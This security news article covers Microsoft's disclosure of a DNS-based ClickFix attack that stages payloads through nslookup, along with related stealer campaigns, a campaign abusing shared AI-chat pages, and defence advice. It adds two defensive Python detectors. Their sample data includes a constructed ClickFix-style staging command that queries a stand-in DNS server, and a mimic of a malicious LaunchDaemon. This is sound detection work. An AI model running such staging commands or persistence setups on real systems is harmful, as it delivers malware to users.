Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging

Security Reporter

Microsoft has uncovered a new ClickFix variant that uses nslookup commands to retrieve malware payloads via DNS, bypassing traditional security controls through procedural deception.

Microsoft has uncovered a sophisticated new variant of the ClickFix social engineering attack that leverages DNS lookups to deliver malware payloads, marking a significant evolution in how threat actors bypass security controls through procedural deception rather than technical vulnerabilities.

The Evolution of ClickFix Attacks

ClickFix has emerged as one of the most effective social engineering techniques in recent years, exploiting human trust rather than software flaws. The attack typically begins when victims encounter fake CAPTCHA verification pages or bogus troubleshooting instructions that prompt them to run commands through their operating system's terminal or command prompt.

The technique's effectiveness stems from its exploitation of procedural trust - users are conditioned to follow technical instructions when encountering supposed verification steps or system errors. This psychological manipulation has proven so successful that it has spawned multiple variants including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

DNS-Based Staging: A New Attack Vector

The latest ClickFix variant discovered by Microsoft represents a significant technical advancement. Instead of relying solely on web-based staging, attackers now use the nslookup command to perform custom DNS lookups that retrieve the next-stage payload.

"In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver," Microsoft Threat Intelligence explained. "The output is filtered to extract the Name: DNS response, which is executed as the second-stage payload."

This approach offers several advantages to attackers:

  • Reduced dependency on traditional web requests: By using DNS as a staging channel, the attack can blend with normal network traffic patterns
  • Infrastructure control: DNS queries can reach attacker-controlled infrastructure while appearing as routine network activity
  • Validation layer: The DNS-based approach adds an additional step before executing the final payload, potentially evading some security controls
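The staging pattern Microsoft describes (nslookup pointed at a hard-coded external server, output filtered for the "Name:" line, the whole thing driven from cmd.exe) is visible in process-creation telemetry before any DNS packet leaves the host. The following is an added example of a detection heuristic, not Microsoft's own logic. It scores constructed process-creation records (shaped like Sysmon Event ID 1 fields; the records, the resolver allow-list and the scoring weights are assumptions) and flags nslookup invocations whose server argument is not one of the organisation's sanctioned resolvers.

```python
"""Heuristic detector for ClickFix-style DNS staging via nslookup.

Added example, not Microsoft's detection logic. Records are constructed to
resemble Sysmon Event ID 1 (process creation) fields. Scoring weights and the
resolver allow-list are placeholders an analyst would tune for their estate.
"""
import re
from dataclasses import dataclass, field

# Assumption: the organisation's sanctioned resolvers (placeholder addresses).
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
THRESHOLD = 3
SHELL_OPERATORS = {"|", "&", "&&", "||", ">", ">>"}


@dataclass
class Finding:
    pid: int
    score: int
    reasons: list = field(default_factory=list)


def analyze(record):
    """Return a Finding for one process-creation record, or None if benign."""
    cmd = record["CommandLine"]
    toks = cmd.split()
    lowered = [t.lower().strip('"') for t in toks]
    try:
        i = next(k for k, t in enumerate(lowered)
                 if t.endswith("nslookup") or t.endswith("nslookup.exe"))
    except StopIteration:
        return None  # not an nslookup invocation at all

    # nslookup's positional arguments are <name> [server]; options start with
    # '-' and a shell operator ends the nslookup part of the command line.
    positional = []
    for t in toks[i + 1:]:
        if t in SHELL_OPERATORS:
            break
        if t.startswith("-"):
            continue
        positional.append(t.strip('"'))

    f = Finding(pid=record["ProcessId"], score=0)
    if len(positional) >= 2:
        server = positional[1]
        if server not in APPROVED_RESOLVERS:
            f.score += 3
            f.reasons.append(f"explicit DNS server {server} is not an approved resolver")
    # Output filtered for the answer's Name: line, the staging trick in the article.
    if re.search(r"\b(findstr|find)\b.*name:", cmd, re.IGNORECASE):
        f.score += 2
        f.reasons.append("output filtered for the 'Name:' answer line")
    if "cmd.exe" in record["Image"].lower() or "cmd.exe" in record["ParentImage"].lower():
        f.score += 1
        f.reasons.append("launched through cmd.exe")
    return f if f.score >= THRESHOLD else None


def scan(records):
    """Run analyze() over every record and return the findings that fired."""
    return [f for f in (analyze(r) for r in records) if f is not None]


# Constructed sample telemetry: two routine lookups, one ClickFix-style pipeline,
# one unrelated command. 203.0.113.10 is a documentation-range placeholder.
SAMPLE_RECORDS = [
    {"ProcessId": 1, "Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "nslookup mail.example.com"},
    {"ProcessId": 2, "Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "nslookup intranet.example.com 10.0.0.53"},
    {"ProcessId": 3, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c nslookup verify.example.invalid 203.0.113.10 | findstr Name:"},
    {"ProcessId": 4, "Image": r"C:\Windows\System32\PING.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "ping 10.0.0.1"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(f"pid={finding.pid} score={finding.score}: " + "; ".join(finding.reasons))
```

The explicit-server check carries the most weight because it is the part of the chain that distinguishes staging from ordinary troubleshooting: administrators rarely hand nslookup a resolver address, and when they do it is normally one the organisation already operates. A parent of explorer.exe (the Run dialog) on the flagged record is a further corroborating signal an analyst would add from their own baseline.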

Attack Chain and Payload Delivery

Once the DNS lookup retrieves the payload information, the attack chain proceeds through several stages. The initial payload downloads a ZIP archive from an external server (azwsappdev[.]com), from which a malicious Python script is extracted.

This Python script conducts system reconnaissance, runs discovery commands, and ultimately drops a Visual Basic Script (VBScript) that launches ModeloRAT - a Python-based remote access trojan previously distributed through CrashFix campaigns.

To ensure persistence, the malware creates a Windows shortcut (LNK) file pointing to the VBScript in the Windows Startup folder, guaranteeing automatic execution on system boot.

Broader Threat Landscape: Lumma Stealer and CastleLoader

The ClickFix technique has become central to the distribution of various malware families, particularly Lumma Stealer. Bitdefender has documented a surge in Lumma Stealer activity driven by ClickFix-style fake CAPTCHA campaigns that deploy CastleLoader, a sophisticated malware loader.

CastleLoader incorporates several evasion techniques:

  • Virtualization detection: Checks for the presence of virtualization software
  • Security program identification: Scans for specific security applications
  • In-memory execution: Decrypts and launches stealer malware directly in memory to avoid disk-based detection

Beyond ClickFix, CastleLoader campaigns also leverage websites advertising cracked software and pirated movies. These sites deceive users into downloading rogue installers or executables masquerading as legitimate media files.

Cross-Platform Threats: macOS Targeting

The threat landscape extends beyond Windows systems. A macOS campaign has been observed using phishing and malvertising to deliver Odyssey Stealer, a rebrand of Poseidon Stealer (itself a fork of Atomic macOS Stealer).

Odyssey Stealer demonstrates the sophistication of modern macOS malware:

  • Cryptocurrency focus: Prioritizes theft of credentials and data from 203 browser wallet extensions and 18 desktop wallet applications
  • Full RAT capabilities: Beyond credential theft, it operates as a complete remote access trojan
  • Persistent command channel: A LaunchDaemon polls the command-and-control server every 60 seconds for instructions
  • Advanced features: Supports arbitrary shell execution, reinfection, and SOCKS5 proxy tunneling

Search Engine Manipulation and Ad-Based Distribution

Threat actors have developed sophisticated methods to distribute malware through legitimate channels. One campaign exploits the public sharing feature of generative AI services like Anthropic Claude to stage malicious ClickFix instructions.

These attackers create seemingly legitimate links associated with trusted platforms and distribute them through sponsored search results. For example, users searching for "macOS cli disk space analyzer" have been directed to fake Medium articles impersonating Apple's Support Team.

"The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted site," AdGuard noted. "Clicking the ad leads to a real Claude page, not a phishing copy."

This technique exploits the trust users place in search engine results and well-known platforms, creating a potent malware distribution vector.

Email Phishing and AppleScript Attacks

Email-based campaigns continue to evolve with new tactics. One phishing campaign uses password-protected ZIP archives containing malicious SVG files that instruct victims to run PowerShell commands using ClickFix, ultimately deploying Stealerium - an open-source .NET infostealer.

Another macOS email phishing campaign prompts recipients to download and run AppleScript files to address supposed compatibility issues. The malware forges TCC (Transparency, Consent, and Control) authorizations for trusted Apple-signed binaries like Terminal and osascript, then executes malicious actions through these binaries to inherit their permissions.

ClearFake Campaign and Blockchain Abuse

The ClearFake campaign represents another evolution in malware distribution, employing fake CAPTCHA lures on compromised WordPress sites to trigger the execution of HTML Application (HTA) files and deploy Lumma Stealer.

This campaign also uses malicious JavaScript injections that rely on a technique called EtherHiding. EtherHiding calls smart contracts hosted on the BNB Smart Chain to fetch payloads from GitHub, offering attackers several advantages:

  • Blending with legitimate Web3 activity: Malicious traffic becomes indistinguishable from normal blockchain operations
  • Increased resilience: Blockchain's immutability and decentralization make takedown efforts more difficult
  • Evasion capabilities: The technique helps bypass traditional security controls

The macOS Security Myth

Recent analysis by Flare has highlighted the dangerous misconception that "Macs don't get viruses." This assumption is not just outdated but actively dangerous, particularly given the cryptocurrency focus of modern macOS malware.

"Nearly every macOS stealer prioritizes cryptocurrency theft above all else," Flare noted. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible."

Organizations with Mac users need to implement detection capabilities for macOS-specific tactics, techniques, and procedures (TTPs), including:

  • Unsigned applications requesting passwords
  • Unusual Terminal activity
  • Connections to blockchain nodes for non-financial purposes
  • Data exfiltration patterns targeting Keychain and browser storage
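The Odyssey Stealer detail earlier in the article (a LaunchDaemon polling its C2 every 60 seconds) and the macOS TTP list above both point at launchd as a place to look. The following is an added example of a persistence audit, not Flare's or any vendor's tooling. It parses launchd property lists with the standard-library plistlib and scores each job on a short polling interval, an interpreter run against a script in a user-writable path, an Apple-style label backed by a non-Apple program, and RunAtLoad; the two sample plists, their paths and the weights are constructed assumptions.

```python
"""Audit launchd property lists for stealer-style persistence traits.

Added example, not vendor tooling. The sample plists below are constructed;
weights and path prefixes are heuristics to tune against a known-good baseline.
"""
import plistlib

# Locations where Apple and package managers legitimately place programs.
SYSTEM_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
APPLE_PREFIXES = ("/System/", "/usr/", "/Library/Apple/")
# Locations an unprivileged user (or a just-dropped script) can write to.
USER_WRITABLE_HINTS = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/")
INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python3", "python"}
THRESHOLD = 4


def score_job(plist):
    """Score one parsed launchd job; returns (score, reasons)."""
    args = plist.get("ProgramArguments") or []
    prog = plist.get("Program") or (args[0] if args else "")
    score, reasons = 0, []

    interval = plist.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:
        score += 2
        reasons.append(f"StartInterval {interval}s (beacon-style polling)")

    if prog and not prog.startswith(SYSTEM_PREFIXES):
        score += 2
        reasons.append(f"program {prog} lives outside system locations")

    # An interpreter pointed at a script in a user-writable directory.
    base = prog.rsplit("/", 1)[-1]
    if base in INTERPRETERS and any(h in a for a in args[1:] for h in USER_WRITABLE_HINTS):
        score += 2
        reasons.append("interpreter runs a script from a user-writable path")

    label = plist.get("Label", "")
    if label.startswith("com.apple.") and not prog.startswith(APPLE_PREFIXES):
        score += 2
        reasons.append(f"Apple-style label {label} backed by non-Apple program")

    if plist.get("RunAtLoad"):
        score += 1
        reasons.append("RunAtLoad set")
    return score, reasons


def audit(plists):
    """plists: mapping of path -> raw plist bytes. Returns flagged jobs."""
    flagged = []
    for path, raw in plists.items():
        score, reasons = score_job(plistlib.loads(raw))
        if score >= THRESHOLD:
            flagged.append((path, score, reasons))
    return flagged


# Constructed samples: a routine backup job and a mimic of the pattern described
# in the article. The script path is a placeholder, not a real artifact.
SAMPLE_PLISTS = {
    "/Library/LaunchDaemons/com.example.backup.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>Program</key><string>/usr/local/bin/backup</string>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>""",
    "/Library/LaunchDaemons/com.apple.updates.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.updates.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>/Users/Shared/.placeholder-agent</string>
  </array>
  <key>StartInterval</key><integer>60</integer>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

if __name__ == "__main__":
    for path, score, reasons in audit(SAMPLE_PLISTS):
        print(f"{path} score={score}: " + "; ".join(reasons))
```

On a live host the same function would be fed the contents of /Library/LaunchDaemons, /Library/LaunchAgents and each user's ~/Library/LaunchAgents; the prefix lists deliberately leave /opt and /usr/local as lower-weight signals so that Homebrew and in-house tooling do not drown the result.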

Protection and Detection Strategies

Defending against these sophisticated attacks requires a multi-layered approach:

  1. User education: Train users to recognize social engineering tactics and the dangers of running arbitrary commands
  2. Network monitoring: Implement DNS monitoring to detect unusual query patterns and suspicious domains
  3. Endpoint protection: Deploy security solutions capable of detecting in-memory threats and behavioral anomalies
  4. Application control: Restrict the execution of unauthorized scripts and applications
  5. Email filtering: Implement advanced email security to detect phishing attempts and malicious attachments
  6. Search engine safety: Use browser extensions and security tools to identify potentially malicious search results

The ClickFix technique's effectiveness lies not in exploiting technical vulnerabilities but in manipulating human behavior. As such, the most effective defense combines technological controls with comprehensive user awareness training.

Organizations must recognize that the threat landscape has evolved beyond traditional malware distribution methods. The combination of social engineering, legitimate infrastructure abuse, and cross-platform targeting requires a holistic security approach that addresses both technical and human factors.

The emergence of DNS-based staging and blockchain-enabled payload delivery demonstrates that attackers continue to innovate, finding new ways to bypass security controls while maintaining the effectiveness of proven social engineering techniques. Staying ahead of these threats requires constant vigilance, updated security controls, and an understanding of the evolving tactics employed by modern threat actors.
